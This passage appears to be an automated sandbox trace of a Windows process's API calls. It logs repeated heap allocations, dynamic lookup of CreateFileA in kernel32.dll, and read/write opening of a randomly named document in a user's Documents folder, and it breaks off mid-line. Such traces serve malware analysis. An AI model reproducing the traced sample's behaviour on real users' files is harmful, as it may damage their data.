[0035.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0035.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0035.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0035.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0035.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0035.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0035.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0035.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0035.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0035.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0035.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0035.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0035.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0035.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0035.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0035.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0035.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0035.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0035.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0035.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0035.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0035.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0035.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0035.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0035.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0035.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0035.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0035.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0035.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0035.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0035.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0035.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0035.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0035.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0035.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0035.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0035.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0035.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0035.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0035.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0035.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0035.681] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0035.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0035.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0035.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0035.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0035.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.684] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0035.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ca48 [0035.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ca48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0035.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.684] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0035.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0035.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca48 [0035.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88ca48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0035.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.685] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0035.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0035.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0035.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0035.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0035.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots", cchWideChar=103, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 103 [0035.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x67) returned 0x7c10a8 [0035.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots", cchWideChar=103, lpMultiByteStr=0x7c10a8, cbMultiByte=103, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots", lpUsedDefaultChar=0x0) returned 103 [0035.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0035.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.685] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x\\ol52nfgjkpyhfqmjctg.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0035.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0035.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0035.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0035.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0035.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0035.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=103, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 103 [0035.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xce) returned 0x791268 [0035.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=103, lpWideCharStr=0x791268, cchWideChar=103 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots") returned 103 [0035.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0035.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd0) returned 0x791190 [0035.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791268 | out: hHeap=0x770000) returned 1 [0035.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0035.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0035.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0035.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0035.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0035.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0035.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0035.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0035.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0035.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0035.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0035.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0035.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0035.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0035.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0035.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0035.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0035.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0035.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0035.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0035.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0035.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.687] HeapFree (in: 